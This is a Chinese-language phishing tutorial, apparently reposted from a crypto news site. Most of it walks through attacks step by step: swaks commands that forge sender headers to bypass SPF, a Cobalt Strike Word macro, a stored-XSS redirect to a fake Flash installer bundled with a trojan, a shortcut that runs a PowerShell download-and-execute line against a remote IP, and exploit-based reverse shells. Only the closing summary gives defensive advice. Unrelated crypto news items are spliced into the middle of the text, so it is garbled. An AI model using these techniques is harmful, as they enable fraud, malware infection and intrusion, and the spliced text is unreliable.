釣魚與反釣魚技術淺析
1.郵箱釣魚
0X00郵箱偽造技術
0X01Swaks偽造郵件
swaks堪稱SMTP協議的瑞士軍刀,使用它我們可以靈活的操作SMTP協議報文
通常最簡單的發送命令:
swaks--touser@example.com--servertest-server.example.net
同時,SPF檢測會FAIL
0x01smtp2go
smtp2go主要是相當于郵件托管,可以分發子賬戶進行發送。地址:https://support.smtp2go.com/hc/en-gb普通賬戶可以免費發1000封郵件。分配好賬戶后,可以通過swaks進行登錄發送郵件:
0x02swaks發送郵件
swaks--totest@gmail.com--fromadmin@qq.com--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASS>
但是上面這個郵件無法繞過SPF
0x03SPF驗證原理
如果mail.smtp2go.com是我的郵件服務器,那么gmail服務器收到的源IP也肯定是mail.smtp2go.com的IP。gmail會校驗郵件發送者的IP是否存在于smtp.from的域名spf配置列表里。而上面這條命令:
waks--totest@gmail.com--fromadmin@qq.com--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASS>
smtp.from就是admin@qq.com,和mail.smtp2go.com的IP肯定不同,所以SPF校驗失敗,而校驗失敗的郵件,會有很高的幾率被扔到垃圾郵件中。默認情況下,如果未設置Mail.From也就是郵件頭的From,則會使用smtp.from作為Mail.From
0x04繞過SPF
由于郵件顯示的是Header中的From不是smtp.from,因此可以將smtp.from設置為正常的郵件服務器地址,偽造一個Mail.From即可
swaks--toceshi@aliyun.com--fromxx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>
投資公司Bitkraft第二只代幣基金完成2.206億美元融資:金色財經報道,根據 3 月 30 日提交給美國證券交易委員會 (SEC) 的一份文件,專注于游戲的風險投資公司Bitkraft為其第二個代幣基金籌集了 2.206 億美元,其總目標為 2.4 億美元。該公司曾于 2021 年 10 月推出類似基金,承諾資本為 7500 萬美元,?旨在投資區塊鏈游戲和數字娛樂。
對于新基金,Bitkraft無法評論投資授權的性質,但合伙人 Carlos Pereira 在接受采訪時概述了該公司的一般 Web3 投資策略。[2023/4/7 13:49:21]
Gmail接收到這封郵件后,會校驗--from?xx@smtp2go.com?中的smtp2go.com是否等于mail.smtp2go.com的IP,由于是相等的,所以完成了SPF的校驗。而DKIM是校驗郵件完整性的,smtp2go與Gmail直接使用的是TLS,不會發生什么問題
代0x05Header
swaks支持自定義某些Header,參數如下:
swaks--header-<Name><Value>
如果我想去除Mailer特征,就可以這么做:
swaks--header-X-Mailergmail.com--toceshi@aliyun.com--from?xx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com?--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>
0x06附件、釣魚
swaks--header-X-Mailergmail.com--toceshi@aliyun.com--from?xx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com?--bodyhello--servermail.smtp2go.com-p2525-au<USER>-ap<PASSS>?--attach/tmp/sss.rtf
定制發送:
swaks--data/tmp/mail.data--header-X-Mailergmail.com--to?ceshi@aliyun.com--fromxx@smtp2go.com--h-From:'管理員<admin@qq.com>'--ehlogmail.com--bodyhello--server?mail.smtp2go.com-p2525-au<USER>-ap<PASSS>--attach
/tmp/sss.rtf/tmp/mail.data中是原始的郵件報文。
Celo Camp公布第6批項目入圍名單并得到Coinbase Cloud支持:金色財經報道,Celo 基金會與 Upright 合作推出的加密孵化項目 Celo Camp 已公布第 6 批項目入圍名單,從 65 個國家的 356 名申請方中最終選擇了 30 個團隊,覆蓋ReFi、DeFi、支付、創造者經濟、P2E 和 DAO 等領域,包括:Kolor、Blockless、inTheory、Neutral Protocol、Nomis、Whatclass、Skylink、AgriVirtus等,這些團隊將受益于與 Coinbase Cloud 及其 Web3 加速器計劃的新合作,包括提供一套 Web3 應用程序接口、服務和基礎設施、以及高達 25,000 美元的云積分。據悉,Coinbase Cloud 將與 AWS、Hubspot 和 Twilio SendGrid 一起為 Celo Camp 團隊提供持續的服務和支持。據悉,冠軍可獲得 1 萬 cUSD、亞軍可獲得 5000 cUSD,最能體現 Celo 社區原則的五個團隊將分別獲得 2000 cUSD。(crypto-reporter)[2022/10/8 12:49:43]
0x07Python實現碼
#!/usr/bin/python
#-*-coding:UTF-8-*-
importsmtplib
fromemail.mime.textimportMIMEText
fromemail.headerimportHeader
mail_host="mail.smtp2go.com"
mail_user=""
mail_pass=""
sender='test@smtp2go.com'
receivers=
message=MIMEText('HelloWorld','plain','utf-8')
message=Header("from@qq.com",'utf-8')
message=?Header(receivers,'utf-8')
subject='SMTP郵件測試'
message=Header(subject,'utf-8')
try:
????smtpObj=smtplib.SMTP()
????smtpObj.connect(mail_host,25)
????smtpObj.login(mail_user,mail_pass)
????smtpObj.sendmail(sender,receivers,message.as_string())
????print"Success"
Blockchain.com已在意大利注冊為虛擬資產服務提供商:金色財經消息,總部位于倫敦的加密公司Blockchain.com周四宣布已在意大利注冊為虛擬資產服務提供商,它現在可以在意大利監管機構OAM的管轄下向意大利居民和機構投資者提供加密和數字錢包服務。根據預計在2024年之后生效的規則,加密公司將需要許可證和客戶保障措施才能在歐盟發行和銷售數字代幣。其他主流加密交易所包括幣安(Binance)、Coinbase Global、Crypto.com和德國投資平臺Trade Republic都已在OAM獲得注冊。[2022/8/5 12:03:08]
exceptsmtplib.SMTPException:
????print"Error"s附件攜馬技術
2?.?Office釣魚
0X00CobaltStrike生成一個office的宏
0X01打開Word文檔,點擊“Word選項—自定義功能區—開發者工具(勾選)—確定”
0X02編寫主體內容后,點擊“開發工具—VisualBasic”,雙擊“ThisDocument”,將原有內容全部清空,然后將剛剛生成的宏惡意代碼全部粘貼進去,保存并關閉該VBA編輯器。
0X03然后將文檔發送給別人,內容可以是任何誘惑性的文字,比如通知等,可以針對目標進行相對的文字說明
Office正常情況下是不啟用的宏的,可以誘導用戶啟用
可以通過如下等文字心里暗示
當點擊啟用宏的時候,木馬就上線了
3.?XSS+flash釣魚
0x01準備工作
一臺服務器,一個域名,一個木馬
0x02網頁構造
源碼地址:https://github.com/r00tSe7en/Fake-flash.cn?偽造后是下面這個樣子,當然我這是半成品,實戰過程中需要購買相似性特別強的域名用來迷惑
上市區塊鏈公司Future Fintech旗下資管公司NTAM已具備管理虛擬資產的資格:6月13日消息,美國上市區塊鏈公司Future Fintech今日宣布旗下擁有90%股權的中國香港資產管理公司Nice Talent Asset Management Limited(NTAM)已具備在特定條件下管理虛擬資產的資格,該資產類別低于其投資組合總資產價值的10%。
NTAM將遵守香港證監會發布的監管要求。目前,該公司正在探索和分析管理虛擬資產的可行性,截至本公告發布之日,其投資授權沒有變化。(PR Newswire)[2022/6/13 4:23:10]
修改木馬下載地址
0x03木馬生成
??在flash官網找到安裝包,下載下來與木馬捆綁在一起。去生成自己的木馬,這里使用CobaltStrike作為演示
將兩個文件放在一起
同時選中官方文件和木馬,用winrar創建自解壓文件。
選擇高級-自解壓選項-更新-覆蓋所有文件
設置解壓路徑
設置提取后運行的文件,分別把正常程序和木馬運行路徑填入
設置模式全部隱藏
Curve將3pool中的參數A從5000下調至2000,USDT比例從75%下降至63%:金色財經消息,Curve將3pool中的參數A從5000下調至2000,USDT在3pool中的比例已從75%下降至63%(USDT價格保持不變,目前為0.999)。Curve表示將繼續觀察3pool資金池狀況看是否需要將參數A下調至1000。[2022/6/2 3:58:50]
點擊確定后生成文件
為了更具有迷惑性使用ResourceHacker修改圖標,將文件拖入后選擇操作-替換圖標
選擇正常的flash
然后放在目錄下
0x03利用
找到有存儲型xss漏洞的網站,這里以本地dvwa靶場為例,插入以下代碼
<script>alert(“您的flash版本過低,請嘗試升級后訪問該頁面”);window.location.href=”http://192.168.121.175/”;</script>
由于是存儲型XSS,所以每次訪問這個頁面都會彈窗并且點擊確定后強制跳轉至我們的釣魚頁面
點擊下載后,運行exe,我們就成功了。
成功上線
4.?快捷方式釣魚
4.1快捷方式文件釣魚
lnk文件是用于指向其他文件的一種文件。這些文件通常稱為快捷方式文件,通常它以快捷方式放在硬盤上,以方便使用者快速的調用。lnk釣魚主要將圖標偽裝成正常圖標,但是目標會執行shell命令。
同樣使用CobaltStrike生成相應的木馬代碼
會得到一串powershell代碼
Powershell.exe-nop-whidden-c"IEX((new-objectnet.webclient).downloadstring('http://192.168.121.156:80/a'))"
然后新建快捷方式將上面的powershell語句填入
下一步,然后自己命名一下,點擊完成
可以更改圖標使其更具有誘惑性
當受害者雙擊之后就會自動執行我們的惡意payload,從目標網站下載并執行。
最終被得到shell。
偽裝完畢
發送給目標點擊后直接上線
4.2欺騙釣魚:
同樣,利用CobaltStrike生成一個惡意木馬程序
利用最開始提到的郵箱偽造技術或者通過其他手段拿到內部人員的郵箱賬號
發送假的通知
當目標群體下載附件運行以后,就上線了
同樣,上面提到的word也可以用這種方式來進行釣魚攻擊
5.0day/nday漏洞釣魚
雙殺漏洞
0x00將CVE-2018-8147利用程序下載到本地并且進入相關目
本機IP:192.168.121.129
0x01執行命令生成payload
開啟web服務并且將exp.html和test.rtf復制到web服務目錄下面
攻擊方式一:
0x00本地監聽上述的7777端口
0x01然后將地址發送給目標用戶誘導其點開
對應網頁會報錯
觀察我們的監聽機器
成功反彈shell
可以執行任意命令
攻擊方式二:
剛剛的文檔,我們可以改名為具有誘惑性的標題
同樣開啟監聽
發給用戶
誘導點開
然后同樣會反彈shell
總結
網絡釣魚已成為實施電子犯罪的更常見手段。據統計,網絡釣魚電子郵件在全球郵件流量中所占的份額超過50%,用戶的15%至少遭受一次網絡釣魚攻擊,攻擊公司的比例為85%。大約80%的攻擊是盜竊資金。大多數網絡釣魚活動都是短期的。
每次研究人員想出任何發現和預防網絡釣魚的想法時,網絡釣魚者都會使用當前解決方案中發現的漏洞來更改其攻擊策略。網絡釣魚詐騙可以通過惡意軟件或社會工程來執行,后者指的是使用假冒的網頁或電子郵件。
當前,沒有任何工具可提供100%的防護以防止網絡釣魚攻擊,因為這些攻擊大多數都是人為因素。由于區塊鏈是一項需要投資的快速發展的新技術,因此對區塊鏈項目的網絡釣魚攻擊數量每年都將增加。
受網絡釣魚攻擊影響的人員和公司最常見的錯誤是:
1)對基礎設施的保護不足;
2)轉到從信件到虛假網站的鏈接;
3)從騙局消息中啟動惡意腳本;
4)信任欺詐性的廣告活動,保證快速簡便的收入;
5)社交網絡中的保護水平不足;
6)對包含SSL證書的網站的過度信任;
7)投資ICO時對項目的了解不足;
8)無法使用現代的防御網絡釣魚攻擊的方法。
整體解決方案:
1)使用書簽代替鏈接;
2)使用帶有反網絡釣魚擴展名的瀏覽器,
3)安裝反網絡釣魚軟件,
4)禁止點擊鏈接和下載可疑附件;
5)使用服務之前對SSL證書進行身份驗證;
6)發布加密錢包的離線副本;
7)使用雙重身份驗證復雜密碼;
8)拒絕公共Wi-Fi,使用安全網關。
來源:金色財經
新的一年到來之際,我們花費了大量時間對2022年想要完成的關鍵里程碑進行了戰略思考,包括如何將這些里程碑融入我們的長期愿景,以及如何抓住快速發展的DeFi行業提供的巨大機遇.
1900/1/1 0:00:00元宇宙代表了虛擬空間中的另一個世界,用戶可以在其中過上正常的生活。通過創建頭像,用戶可以在虛擬世界中獲得獨特的身份,并且可以在其中運動、工作、賺錢和娛樂.
1900/1/1 0:00:002008年中本聰第一次提出了區塊鏈的概念,區塊鏈是一個信息技術領域的術語。從本質上講,它是一個共享數據庫,存儲于其中的數據或信息,具有"不可偽造""全程留痕""可以追溯""公開透明""集體維護".
1900/1/1 0:00:00作為NFT愛好者,每當有知名IP爆款或新品上線Mint時,我和我的小伙伴總是第一時間沖在前線。Mint后,大多NFT都會以盲盒形式存在數天才會開盒.
1900/1/1 0:00:00本周技術周刊包含以太坊、EOS、Cardano、Hedera、Harmony、Nym、Phala、Polygon、Optimism、Phala、Astar、StarkWare、Avalanche.
1900/1/1 0:00:00近日Opensea出現了多個低價成交的頭部項目,疑似掛單有bug被黑客攻擊,黑客通過低價買到頭部的NFT項目BoredApeYachtClub等等,再立馬高價售出,以此獲利數百ETH.
1900/1/1 0:00:00